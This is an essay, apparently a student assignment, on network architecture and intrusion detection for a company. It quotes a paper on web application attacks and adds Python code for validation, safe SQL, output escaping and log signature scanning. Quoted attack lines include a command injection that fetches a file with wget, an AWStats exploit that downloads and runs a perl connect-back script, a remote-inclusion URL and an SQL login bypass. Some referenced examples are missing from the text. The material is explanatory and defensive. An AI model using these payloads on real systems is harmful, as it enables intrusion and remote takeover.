The design of a communications network is called its network architecture. It is a framework for the specification of a network's physical components and their functional organization and configuration, its operational principles and procedures, and the data formats used in its operation. In this task I suggest an ideal network architecture for the company, and I also provide a basic network diagram with a full explanation and justification of every component I include. For the internal workstations I concentrate on the architecture for a web application platform. All the information related to these topics is given below.
I explain several branches related to my topic in this task. For the company I try to design an ideal network architecture; my whole approach is set out below, and I use several distinct steps to fulfil the requirements.
Needed components of a network architecture:
To build a network, a number of things are needed; they are called the basic components of a network architecture. The components that make up a network are listed below, with a description of each piece of equipment and of the connections and uses of each component in this network. All networks are made up of some basic components that interconnect network nodes, such as the web server, database server, workstations, routers, switches, firewall, VPN server, IDS manager, Internet router, the Internet and the DMZ.
All the needed explanation of these components is given below:
Workstation:
A workstation is a high-end microcomputer designed for technical or scientific applications. Intended primarily to be used by one person at a time, workstations are commonly connected to a local area network and run multi-user operating systems. The term has also been used for a mainframe computer terminal or a PC connected to a network.
Web server:
A computer that delivers web pages is called a web server. Every web server must have an IP address and possibly a domain name. The term refers to the program that serves content such as web pages using HTTP over the World Wide Web, and also to the computer or virtual machine running that program. In large commercial deployments, server computers running a web server can be rack-mounted with other servers to operate as a web farm.
Database server:
A database server is a computer program that provides database services to other computers or programs, as defined by the client-server model. The term may also refer to a computer dedicated to running such a program. Database management systems frequently provide database server functionality, and some DBMSs rely exclusively on the client-server model for database access.
Router:
A router is a device that forwards data packets between networks. A router is connected between at least two (often many) WANs or LANs and to the ISP network. A router works like a switch in that it only sends data to its intended recipient; it blocks broadcasts and packets sent to unknown addresses.
Hub:
A hub is a device that connects a number of systems or network devices; it is the common connection point in a network. In a LAN, hubs are used to join segments. A hub has multiple ports, and whenever a packet arrives at one port it is copied to all the other ports, which is why every packet on the LAN segment can be seen by every device attached to the hub.
Switch:
A switch is a hardware device that works like a hub but directs data only to the specific port of the device whose hardware (MAC) address the frame is addressed to. (In electrical terms, a switch is a component that breaks, diverts or interrupts an electrical circuit from one conductor to another.)
Firewall:
A firewall is a protection that can be implemented as a software application or a hardware device and is designed to restrict access between networks. It is a technological barrier designed to prevent unauthorized and unwanted traffic from reaching the network infrastructure or hosts. A firewall is a single device or a set of devices that allows or rejects network transmissions based on a set of policies and other criteria.
VPN (Virtual Private Network) server:
A VPN is a secure network that uses a public network, such as the Internet, to carry its communication. It is a computer network that uses the infrastructure of a public telecommunications network, such as the Internet, to give remote offices or individual users secure access to their organization's network, avoiding the cost of a system of owned or leased lines that could be used only by that organization.
IDS (Intrusion detection system) manager:
An IDS is a device or software application that monitors network and system activities for malicious activity or policy violations and produces reports to a management station. Intrusion prevention is the process of performing intrusion detection and then attempting to stop the possible incidents that are detected.
DMZ (Demilitarized zone):
A DMZ is a neutral area designed to allow an organization to offer limited services while protecting critical assets. Like its military counterpart, a demilitarized zone is designed as a neutral area that separates threats from protected assets. In network security a DMZ is usually accomplished by implementing at least two separate firewalls, one facing the Internet and the other facing the internal network.
Diagram of network architecture:
As a first step I design the best architecture diagram for the network, which can be helpful when setting the network up. I hope it will also be useful in preventing every kind of breach and be easy to maintain. The diagram of the network architecture is given below:
Having understood the nature of the breaches of the company's network, I explain the most common attacks on web applications and the strategies for mitigating them. Web applications offer services such as bulletin boards, mail services such as SquirrelMail, online shops, or database administration tools like phpMyAdmin. They significantly increase the exposed surface area through which a system can be exploited. By their nature, web applications are often accessible to the Internet as a whole, meaning a very large number of potential attackers. All these factors have made web applications a very attractive target for attackers and led to the emergence of new attacks. This KYE paper focuses on application threats against common web applications. After reviewing the fundamentals of a typical attack, we go on to describe the trends we have observed and the research methods we currently use to observe and monitor these threats.
Measurement of common attacks on web applications:
Web applications face a unique set of vulnerabilities because they are accessed through browsers, integrated with databases, and exposed through highly visible web servers. A modern web server setup commonly hosts multiple applications on one host, all reachable via a single port, creating a large attack surface.
There are four major web application threats at high risk:
Cross-site Scripting (XSS)
Explanation of these web application threats:
Code injection is one such attack. It exploits a web application's interface to the underlying operating system and results in the execution of arbitrary code. A simple example of a PHP code-injection vulnerability follows:
<?php
// Deliberately vulnerable: the request parameter is passed straight to exec()
$yourName = $_GET['name'];
echo exec("echo $yourName");
?>
Directing a web browser to this application at the URL "application.php?name=Magoo" would result in the display of a web page containing the word "Magoo". However, using the value "Magoo; wget 126.96.36.199/toolkit.c" would execute two statements within the exec() function; the second statement is a malicious attempt to download a file to the victim host. A vulnerability similar to this was present in some versions of the Advanced Web Statistics (AWStats) script, a popular application used for summarizing information about visitors to a web site. This vulnerability has been widely abused by several worms, including Lupper. Note that AWStats is written in Perl, so the problems we describe are by no means unique to PHP.
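The same defect and its fix, as an added example that is not part of the original essay or of the KYE paper it draws on. The page's snippet is PHP; this version is Python so the two behaviours can be run side by side. It assumes an allow-list policy for the name parameter (letters, digits, underscore, hyphen), and the injected second statement is a harmless echo standing in for the page's wget.

```python
import re
import subprocess
from typing import List

# Assumed allow-list policy for the 'name' request parameter: letters, digits,
# underscore and hyphen, 1-32 characters. Shell metacharacters such as ';', '|',
# '&', quotes and whitespace can never pass this check.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_valid_name(name: str) -> bool:
    """Input validation on its own, to run before any command is built."""
    return NAME_RE.fullmatch(name) is not None


def greet_unsafe(name: str) -> List[str]:
    """Mirror of the page's PHP exec("echo $yourName"): the request parameter is
    spliced into a command string that /bin/sh parses, so a ';' in the value
    starts a second command. Returns the output lines, one per command run."""
    result = subprocess.run(f"echo {name}", shell=True,
                            capture_output=True, text=True)
    return result.stdout.splitlines()


def greet_safe(name: str) -> List[str]:
    """Same feature, hardened: reject anything outside the allow-list, then pass
    the value as a single argv element with no shell in the path, so shell
    metacharacters are never interpreted."""
    if not is_valid_name(name):
        raise ValueError("rejected 'name' parameter")
    result = subprocess.run(["echo", name], capture_output=True, text=True)
    return result.stdout.splitlines()


if __name__ == "__main__":
    # Constructed payload with the shape of the page's "Magoo; wget ..." value,
    # using a harmless second statement so it can be run locally.
    payload = "Magoo; echo INJECTED"
    print("unsafe:", greet_unsafe(payload))   # ['Magoo', 'INJECTED']: second command ran
    print("valid?:", is_valid_name(payload))  # False: rejected before anything runs
    print("safe:  ", greet_safe("Magoo"))     # ['Magoo']
```

The important design point is that the hardened version does two independent things: it validates the value against an allow-list, and it never hands the value to a shell at all. Either alone would have stopped this payload; together they also cover the metacharacters the allow-list author forgot about.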
To quote from the iDEFENSE advisory:
"The problem specifically exists when the application is running as a CGI script on a web server. The "configdir" parameter contains unfiltered user-supplied data that is utilized in a call to the Perl routine open() as can be seen here on line 1082 of awstats.pl:
The "searchdir" variables hold the value of the parameter provided by the attacker from "configdir." An attacker can cause arbitrary commands to be executed by prefixing them with the "|" character."
In the case of the following attempted exploit:
We end up with:
if (open(CONFIG,"|echo ;echo b_exp;wget http://10.0.26.26/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 10.0.233.251 8080...";))
which leads to the execution of the attacker's commands because of the way Perl's open() function treats a leading '|'. It seems that the 'echo b_exp' at the start and a corresponding 'echo e_exp' at the end are intended to simplify parsing of the resulting web page, as in the published exploit.
The PHPBB vulnerability that was exploited by the Santy worm was a problem of this type. PHPBB is a bulletin board written in PHP that allows users to post and reply to messages on various topics. A Google search for PHPBB reveals around 1.5 million sites at the time of writing. The Santy worm initially attempted to exploit the viewtopic.php vulnerability with a small test payload that simply printed out a particular piece of text; if the resulting web page contained the supplied text, the worm would launch its propagation code. (Eventually Google began to block Santy's queries.) The following is an example of an attack observed against PHPNuke that attempts to run the 'id' command. It is a maliciously crafted HTTP GET request:
The 'id' command identifies the current user and seems to be used often to test for command-injection issues, as the results of a successful test are easily identifiable.
A remote code-inclusion attack works similarly; for example the following PHP code:
will include a PHP file into the currently executing script. Under certain circumstances, such as the configuration item register_globals being enabled, an attacker may be able to change the value of the variable $librarydir. (register_globals means that PHP automatically initializes variables from HTTP GET parameters without the programmer's intervention.) Some configurations of PHP allow the inclusion of code specified by a URL rather than a local file name. An attacker exploiting this vulnerability may attempt to set $librarydir to a value such as "http://188.8.131.52/evilscript.php". If the attack is successful, the attacker gains control of the web application.
The vulnerability classes remote code-inclusion and command injection should be considered serious, as they have resulted in a number of high-profile worms attacking the following software:
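The defensive counterpart of the include pattern just described, as an added example (Python rather than the page's PHP; it is not code from the essay or from any of the projects named). It assumes a fixed library directory and a short allow-list of module names, both constructed for the example. The point it demonstrates is that the request is never allowed to supply a directory, a URL or an extension, only a name chosen from a list the application controls, and that any remaining path-like input is checked for a URL scheme and for escaping the library root.

```python
import posixpath

# Assumed layout for this example: library code lives under LIBRARY_ROOT and a
# request may only select one of the names in ALLOWED_MODULES.
LIBRARY_ROOT = "/var/www/app/lib"
ALLOWED_MODULES = {"utils", "auth", "poll"}


def resolve_include(requested: str) -> str:
    """Map a request-supplied module name to the file that will be included.

    Unlike the page's include("$librarydir/...") pattern, where the request can
    set the directory (and, with URL includes enabled, a remote location), the
    request here can only pick a name from the allow-list; the directory and
    extension are fixed by the application, and the variable is always
    initialized explicitly rather than left for register_globals to fill.
    """
    if requested not in ALLOWED_MODULES:
        raise ValueError(f"module not permitted: {requested!r}")
    return posixpath.join(LIBRARY_ROOT, requested + ".php")


def is_local_path_under_root(candidate: str, root: str = LIBRARY_ROOT) -> bool:
    """Defence-in-depth check for code that must accept a path-like value:
    reject anything carrying a URL scheme (remote inclusion) and anything that,
    once normalised, resolves outside the library root (directory traversal)."""
    if "://" in candidate:
        return False
    normalised = posixpath.normpath(posixpath.join(root, candidate))
    return normalised == root or normalised.startswith(root + "/")
```

resolve_include is the form to prefer; is_local_path_under_root is for legacy code that cannot be restructured yet, and the two checks in it are independent so that a URL with no traversal and a traversal with no URL are both caught.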
PHPBB, reported December 21, 2004, attacked by the Santy worm.
AWStats, PHPXMLRPC, WebHints reported November 7, 2005, attacked by the Lupper worm.
Mambo, reported December 6, 2005, attacked by the Elxbot worm.
Mambo, PHPXMLRPC, reported February 20, 2006 and attacked by the Mare worm.
An example attack we observed against Mambo CMS is as follows. Again, it is simply a malicious HTTP GET request, exploiting the vulnerability described in Secunia Advisory #14337:
This has the effect of executing a script of the attacker's choosing, here 'http://192.168.57.112/~photo/cm'. The exact operation of the exploit against the vulnerability can be seen in 'Mambo Exploit' in Appendix A. In this case, the included file is a 'helper' script that attempts to execute the operating system command given by the 'cmd=' parameter. Here the commands given would cause the helper script to be written over the 'index.php' file and the details of the operating system and IP address to be sent to two e-mail addresses. The attackers could then revisit the vulnerable systems at a later date.
An example of a particular helper script, the c99 shell, is given in Appendix B, but such scripts typically allow the attacker to execute operating system commands and browse the file system on the web server. Some more advanced ones offer facilities for brute-forcing FTP passwords, updating themselves, connecting to databases, and initiating a connect-back shell session.
Another web application attack is SQL injection. Suppose a naively implemented login page searches for records in a database that match the given username and password, like this:
$sql = "SELECT * FROM users WHERE username='$username' AND password='$password';";
If the input is not validated correctly, it is possible to set both $username and $password to "' OR '1'='1". The resulting SQL query would be:
SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1' ;
This SQL query always returns a non-empty result, bypassing the login procedure and enabling the attacker to access the application. By successfully exploiting an SQL injection vulnerability the attacker can often gain superuser/admin access to the application or even the operating system.
The following is an attack we observed against PHPNuke:
which exploits the vulnerability detailed in Secunia advisory #14866: the 'querylang' parameter allows an SQL injection attack against the application. The original Waraxe advisory describes the vulnerability. The following source code is the problem:
$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc $querylang order by voters DESC limit 0,$top", $dbi);
Because the application does not initialize the querylang variable, an attacker can choose its value (provided register_globals is enabled in the PHP configuration, which used to be the default). The advisory gives the following example exploit:
and as a result we can see the md5 hashes of all the admin passwords in the place where normally the top 10 votes can be seen :) The exploit reveals the MD5 hashes of all the administrative users of PHPNuke.
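Both SQL injection cases above, the login bypass and the uninitialized querylang variable in the poll query, have the same fix: send values to the database separately from the SQL text, and never let a request fill in a variable the code did not initialize. The following is an added example (Python with sqlite3, not code from the essay or from PHPNuke) that runs the page's login query both ways and shows a hardened form of the poll query. The table contents, the "nuke" table prefix, the planguage column and the allowed-language list are all constructed assumptions; the password column holds a plain string only to keep the example short, where a real application stores a hash.

```python
import sqlite3
from typing import List, Tuple

# Assumed allow-list of values a request may pass as the poll language.
ALLOWED_LANGS = {"english", "french"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret-example')")
    conn.execute("CREATE TABLE nuke_poll_desc (pollID INTEGER, pollTitle TEXT, "
                 "timeStamp INTEGER, voters INTEGER, planguage TEXT)")
    conn.executemany("INSERT INTO nuke_poll_desc VALUES (?, ?, ?, ?, ?)", [
        (1, "Favourite editor", 1131321600, 40, "english"),
        (2, "Best firewall", 1131408000, 75, "english"),
        (3, "Meilleur routeur", 1131494400, 12, "french"),
    ])
    return conn


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The page's login query built by string splicing: the input becomes part
    of the SQL text, so "' OR '1'='1" turns the WHERE clause into a tautology."""
    sql = (f"SELECT * FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the values travel separately from the
    SQL text and can never change its structure."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def top_polls_safe(conn: sqlite3.Connection, querylang: str,
                   top: int = 10) -> List[Tuple]:
    """Hardened form of the page's PHPNuke poll query: querylang is an explicit
    argument (never an uninitialized variable that register_globals could fill),
    it is checked against an allow-list, and both it and the LIMIT are bound."""
    if querylang not in ALLOWED_LANGS:
        raise ValueError(f"unsupported language: {querylang!r}")
    sql = ("SELECT pollID, pollTitle, timeStamp, voters FROM nuke_poll_desc "
           "WHERE planguage=? ORDER BY voters DESC LIMIT ?")
    return conn.execute(sql, (querylang, top)).fetchall()
```

Note that login_safe with the tautology string simply looks for a user literally named "' OR '1'='1", which does not exist, so the login fails; the same string passed to top_polls_safe never reaches the database because the allow-list rejects it first.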
Cross-site Scripting (XSS):
A naive implementation of a bulletin board might store a user's comment in a database and write it straight back to other users who are viewing the thread. By posting something like
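The bulletin board just described, as an added example (Python, not code from the essay) showing the naive rendering beside the encoded form. The comment store and the comment text are constructed; html.escape from the standard library does the output encoding, and the link check goes a step further than encoding because a link whose scheme runs script is not fixed by escaping alone.

```python
import html
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed comment store standing in for the bulletin board's database.
Comment = Dict[str, str]


def post_comment(store: List[Comment], author: str, body: str) -> None:
    """Store the comment exactly as submitted; encoding belongs at output time."""
    store.append({"author": author, "body": body})


def render_thread_unsafe(store: List[Comment]) -> str:
    """The naive board described on the page: stored text is written straight
    back into the HTML, so markup in a comment runs in other users' browsers."""
    return "".join(f"<p><b>{c['author']}</b>: {c['body']}</p>" for c in store)


def render_thread_safe(store: List[Comment]) -> str:
    """Hardened form: HTML-encode every user-controlled value at the point it is
    placed into the page, so '<', '>', '&' and quotes become inert text."""
    return "".join(
        f"<p><b>{html.escape(c['author'])}</b>: {html.escape(c['body'])}</p>"
        for c in store
    )


def safe_href(url: str) -> str:
    """User-supplied links need more than encoding: only http(s) schemes are
    accepted, and the value is attribute-escaped before use in href="...".
    Returns '#' for anything rejected."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)
```

Storing the raw text and encoding on output is deliberate: the same comment may later be rendered into an e-mail, a JSON API or an RSS feed, each with its own encoding rules, so encoding at storage time would be wrong for all but one of them.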
Intrusion Detection and Prevention:
Intrusion Detection and Prevention Systems (IDPS) refers to an architecture of devices, software and other technology solutions designed to monitor network and/or system activities for malicious activity. The main functions of an intrusion prevention system are to identify malicious activity, log information about it, attempt to block or stop it, and report it. Intrusion prevention systems are considered extensions of intrusion detection systems because both monitor network traffic and/or system activities for malicious activity. The main difference is that, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block the intrusions they detect. More specifically, an IPS can take actions such as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address.
Importance of Intrusion Detection and Prevention:
The company has 8 web servers and 2 database servers altogether. They have already faced security breaches several times, as their network has been compromised by hackers. Because they do not have any IDS (Intrusion Detection System), they realize the damage only after a long time, which brings them great loss, so the use of an IDS is a crying need for the company. An Intrusion Detection System can help detect intruders, including unexpected, unwanted or unauthorized people or programs on the computer network, and can therefore protect the systems from unpredictable virus storms or security threats posed by malicious hackers. An ideal Intrusion Detection System should therefore:
Not just monitor system activities, but also analyze users as well as system activities
Scrutinize configurations and susceptibilities of various systems
Constantly review system and file integrity
Issue alarms/alerts in case of security attacks
Actively collect evidence about suspicious activities
Automatically launch back-traces
Recognize the patterns/methods of classic attacks
Look out for irregular activity
Strictly track any policy violations by users
The categories of intrusion detection systems are:
Network Intrusion Detection Systems (NIDS)
Host Intrusion Detection Systems (HIDS)
Perimeter Intrusion Detection System (PIDS)
VM Based Intrusion Detection System (VMIDS)
Network Intrusion Detection Systems (NIDS)
Packet sniffers can be deployed on a network segment to monitor and inspect data traffic. Network administrators use packet sniffers to review header details and peer into the contents of network packets to troubleshoot network problems. NIDS build upon packet sniffer technology by adding logic. A NIDS sensor reviews network traffic and compares the various characteristics of network packets against known examples of malicious network traffic.
When a match or possible match is identified between the characteristics of network packets and malicious traffic, the IDS records the activity as an event in an IDS log for further analysis. This event details the date, time, protocol, source network address, destination network address and other pertinent information. Logging is important because it allows a security professional to review the details of the network traffic and determine whether the activity is indeed an attack.
A NIDS is an overall system of devices that work together to monitor the network. Most NIDS consist of at least one sensor, as well as a collector or manager, a database and a console.
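The sensor step described above, as an added example (Python, not code from the essay or from any IDS product): a small signature matcher run over web server access-log lines that emits an event record with the fields listed above (date, time, protocol, source and destination address). The log lines, the addresses (documentation ranges) and the four signatures are constructed for the example; the signatures are illustrative rules shaped after the attacks discussed earlier on this page, not a real ruleset, and a production sensor would match on decoded request bodies and headers as well as the URI.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Combined-format web server access log line: client address, identity, user,
# timestamp, request line, status, size. Only the fields needed for the event
# record are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Illustrative signatures (assumed, not a real IDS ruleset) for the attack
# patterns described on this page, applied to the URL-decoded request.
SIGNATURES = {
    "command-injection": re.compile(r"[;|`]\s*(?:wget|curl|perl|id)\b", re.I),
    "remote-file-inclusion": re.compile(r"=(?:https?|ftp)://", re.I),
    "sql-injection": re.compile(r"'\s*or\s*'?1'?\s*=\s*'?1", re.I),
    "cross-site-scripting": re.compile(r"<\s*script\b", re.I),
}

# Constructed sample log (documentation address ranges) in the shape of the
# requests the page describes: one benign request, then one of each attack.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Nov/2005:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Nov/2005:10:12:05 +0000] "GET /cgi-bin/awstats.pl'
    '?configdir=%7Cecho;wget%20http://203.0.113.77/tool.txt HTTP/1.1" 200 4096',
    '203.0.113.9 - - [07/Nov/2005:10:12:09 +0000] "GET /app.php'
    '?librarydir=http://203.0.113.77/evilscript.php HTTP/1.1" 200 0',
    '198.51.100.23 - - [07/Nov/2005:10:13:30 +0000] "GET /login.php'
    '?username=%27%20OR%20%271%27%3D%271&password=x HTTP/1.1" 200 220',
    '198.51.100.23 - - [07/Nov/2005:10:14:02 +0000] "GET /viewtopic.php'
    '?t=1&highlight=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900',
]


def parse_log_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into fields; None if it is not well-formed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode before matching so %27, %3C and friends cannot hide a payload.
    rec["decoded_uri"] = unquote_plus(rec["uri"])
    return rec


def inspect_line(line: str, dst: str) -> List[Dict[str, str]]:
    """Sensor step: compare one request against every signature and emit an
    event record carrying the fields the page lists (date, time, protocol,
    source and destination address) plus the rule and the raw request."""
    rec = parse_log_line(line)
    if rec is None:
        return []
    when = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    events = []
    for rule, pattern in SIGNATURES.items():
        if pattern.search(rec["decoded_uri"]):
            events.append({
                "date": when.strftime("%Y-%m-%d"),
                "time": when.strftime("%H:%M:%S"),
                "protocol": rec["proto"],
                "src": rec["src"],
                "dst": dst,
                "rule": rule,
                "request": f"{rec['method']} {rec['uri']}",
            })
    return events


def scan_log(lines: List[str], dst: str) -> List[Dict[str, str]]:
    """Run the sensor over a whole log; the result is what the collector stores."""
    events = []
    for line in lines:
        events.extend(inspect_line(line, dst))
    return events


if __name__ == "__main__":
    for event in scan_log(SAMPLE_LOG, dst="192.0.2.10"):
        print(event["date"], event["time"], event["src"], "->", event["dst"],
              event["protocol"], event["rule"], event["request"])
```

Keeping the raw request in the record is what makes the later human review the page mentions possible: the rule name says why the sensor fired, the request lets the analyst decide whether it was really an attack.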
Figure: Typical network IDS architecture
Host Intrusion Detection (HIDS)
Host intrusion detection (HIDS) complements the functionality of network IDS by monitoring activity on the computer systems themselves. HIDS sensors, unlike NIDS sensors, do not monitor all the traffic on the network but instead listen to traffic on the host itself. However, much like a NIDS, the HIDS sensor can compare data to a list of known signatures and generate an event for any data that matches a signature.
HIDS Architecture: A host IDS typically has sensors, a manager, a database and a console like NIDS. The current popular trend in information security is to leverage the same manager, database and console to monitor both the NIDS and the HIDS. The correlation, reporting and alerting can encompass both the network activity and the activity taking place on the systems. This complementary monitoring picture provides a greater level of intelligence for understanding what attacks may be underway.
Figure: Typical HIDS architecture
PERIMETER INTRUSION DETECTION SYSTEM (PIDS):
A PIDS detects and locates intrusion attempts on the perimeter barriers of critical infrastructure. Using either electronic sensors or more advanced fibre-optic cable fitted to the perimeter fence, the PIDS detects disturbances on the fence; if the system judges a disturbance to be an intrusion attempt, an alarm is triggered.
VM BASED INTRUSION DETECTION SYSTEM (VMIDS):
This approach identifies intrusions by monitoring from a virtual machine: the intrusion detection system is arranged together with virtual machine monitoring. It is the most recent category and is still under development. One benefit is that there is no need to split the intrusion detection across separate systems, because from the virtual machine layer the inclusive activities of the organization can be observed.
Some organizations are sufficiently concerned with detecting the earliest signs of widespread incidents, such as major new worms, that they deploy deceptive measures such as honeypots so that they can collect better data on these threats. A honeypot is a computer system that masks its identity and invites abuse in order to collect information on attackers. Honeypots are hosts that have no authorized users other than the honeypot administrators, because they serve no business function; all activity directed at them is considered suspicious. Attackers will scan and attack honeypots, giving administrators data on new trends and attack tools, particularly malware.
Recommendations to the company about Intrusion Detection and Prevention
Different IDPS types, such as network-based, host-based or honeypots, offer fundamentally different information gathering, logging, detection, and prevention capabilities. Each technology type offers benefits over the others, such as detecting some events that the others cannot, detecting some events with significantly greater accuracy than the other technologies, or performing in-depth analysis without significantly impacting the performance of the protected hosts. Accordingly, organizations should consider using multiple types of IDPS technologies to achieve more comprehensive and accurate detection and prevention of malicious activity, with lower rates of false positives and false negatives.
The Need for Multiple IDPS Technologies
In many environments, a robust IDPS solution cannot be achieved without using multiple types of IDPS technologies. For example, network-based IDPSs cannot monitor wireless protocols, and wireless IDPSs cannot monitor application protocol activity. Table below provides a high-level comparison of the primary IDPS technology types.
Comparison of IDPS technology types (for each type: the kinds of malicious activity it detects, its scope per sensor or agent, and its distinctive strength):
Network-based IDPS. Malicious activity detected: network, transport, and application TCP/IP layer activity. Scope per sensor or agent: multiple network subnets and groups of hosts. Strength: able to analyze the widest range of application protocols; the only IDPS type that can thoroughly analyze many of them.
Host-based IDPS. Malicious activity detected: host application and operating system (OS) activity; network, transport, and application TCP/IP layer activity. Strength: the only IDPS type that can analyze activity that was transferred in end-to-end encrypted communications.
Integrating Different IDPS Technologies
Many organizations use multiple IDPS products, usually from different vendors, and these products function completely independently of each other. If the products are not integrated in any way, the effectiveness of the entire IDPS implementation may be somewhat limited. IDPS products can be directly integrated, such as one product feeding alert data to another product, or indirectly integrated, such as all the IDPS products feeding alert data into a security information and event management system. So for better performance we can use both network-based and host-based intrusion detection.
Type of information should be gathered during a breach
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Incidents have many causes, such as malware (e.g., worms, spyware), attackers gaining unauthorized access to systems from the Internet, and authorized users of systems who misuse their privileges or attempt to gain additional privileges for which they are not authorized.
An intrusion detection system (IDS) is software that automates the intrusion detection process. An intrusion prevention system (IPS) is software that has all the capabilities of an intrusion detection system and can also attempt to stop possible incidents.
In addition to monitoring and analyzing events to identify undesirable activity, all types of IDPS technologies typically perform the following functions:
Recording information related to observed events
Information is usually recorded locally, and might also be sent to separate systems such as centralized logging servers, security information and event management (SIEM) solutions, and enterprise management systems.
Notifying security administrators of important observed events
This notification, known as an alert, occurs through any of several methods, including the following: e-mails, pages, messages on the IDPS user interface, Simple Network Management Protocol (SNMP) traps, syslog messages, and user-defined programs and scripts. A notification message typically includes only basic information regarding an event; administrators need to access the IDPS for additional information.
Reports summarize the monitored events or provide details on particular events of interest.
So from the above discussion we find that the main information that should be gathered during a breach in the company is the log of malicious activities in the network, and that these logs should be sent automatically to the responsible person.
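The manager side of that conclusion, as an added example (Python, not code from the essay or from NIST's IDPS guidance): it takes sensor event records of the kind described in the NIDS section, correlates them per source address, raises an alert when an assumed threshold is crossed, and produces both the short notification the page says administrators receive and a syslog-style line for forwarding to a central log server or SIEM. The events, the threshold, the severity rule and the host name are all constructed assumptions.

```python
import json
from typing import Dict, List

# Constructed sensor events in the record shape the NIDS section describes
# (date, time, protocol, source, destination, matched rule).
SAMPLE_EVENTS = [
    {"date": "2005-11-07", "time": "10:12:05", "protocol": "HTTP/1.1",
     "src": "203.0.113.9", "dst": "192.0.2.10", "rule": "command-injection"},
    {"date": "2005-11-07", "time": "10:12:09", "protocol": "HTTP/1.1",
     "src": "203.0.113.9", "dst": "192.0.2.10", "rule": "remote-file-inclusion"},
    {"date": "2005-11-07", "time": "10:12:40", "protocol": "HTTP/1.1",
     "src": "203.0.113.9", "dst": "192.0.2.11", "rule": "command-injection"},
    {"date": "2005-11-07", "time": "10:13:30", "protocol": "HTTP/1.1",
     "src": "198.51.100.23", "dst": "192.0.2.10", "rule": "sql-injection"},
]

# Assumed escalation policy: two or more events from one source address within
# the batch raise an alert; hitting more than one server makes it high severity.
ALERT_THRESHOLD = 2


def summarize_by_source(events: List[Dict[str, str]]) -> Dict[str, Dict]:
    """Manager-side correlation: group events per source address, keeping first
    and last time seen, the distinct rules matched and the servers targeted."""
    per_src: Dict[str, Dict] = {}
    for e in sorted(events, key=lambda e: (e["date"], e["time"])):
        stamp = f"{e['date']} {e['time']}"
        s = per_src.setdefault(e["src"], {
            "src": e["src"], "count": 0, "first_seen": stamp,
            "last_seen": stamp, "rules": [], "targets": []})
        s["count"] += 1
        s["last_seen"] = stamp
        if e["rule"] not in s["rules"]:
            s["rules"].append(e["rule"])
        if e["dst"] not in s["targets"]:
            s["targets"].append(e["dst"])
    return per_src


def build_alerts(events: List[Dict[str, str]],
                 threshold: int = ALERT_THRESHOLD) -> List[Dict]:
    """Turn per-source summaries that cross the threshold into alert records."""
    alerts = []
    for s in summarize_by_source(events).values():
        if s["count"] >= threshold:
            severity = "high" if len(s["targets"]) > 1 else "medium"
            alerts.append({"severity": severity, **s})
    return alerts


def notification_text(alert: Dict) -> str:
    """The short message for e-mail or pager: basic facts only, as the page
    notes; the full record stays in the IDS console for follow-up."""
    return (f"[{alert['severity'].upper()}] {alert['count']} web attack events "
            f"from {alert['src']} against {len(alert['targets'])} server(s), "
            f"last seen {alert['last_seen']}; rules: {', '.join(alert['rules'])}")


def to_syslog(alert: Dict, host: str = "ids-manager") -> str:
    """Same alert as an RFC 5424-style line for a central log server or SIEM.
    PRI = facility*8 + severity, using facility 4 (security) with severity 1
    (alert) for high and 4 (warning) otherwise; the full record travels as JSON."""
    pri = 32 + (1 if alert["severity"] == "high" else 4)
    stamp = alert["last_seen"].replace(" ", "T") + "Z"
    return f"<{pri}>1 {stamp} {host} webids - - - {json.dumps(alert, sort_keys=True)}"


if __name__ == "__main__":
    for alert in build_alerts(SAMPLE_EVENTS):
        print(notification_text(alert))
        print(to_syslog(alert))
```

Two things here follow directly from the page's requirements: the notification carries only enough to decide whether to act, while the syslog line carries the complete record so that the central log, not the analyst's inbox, is the place the evidence lives.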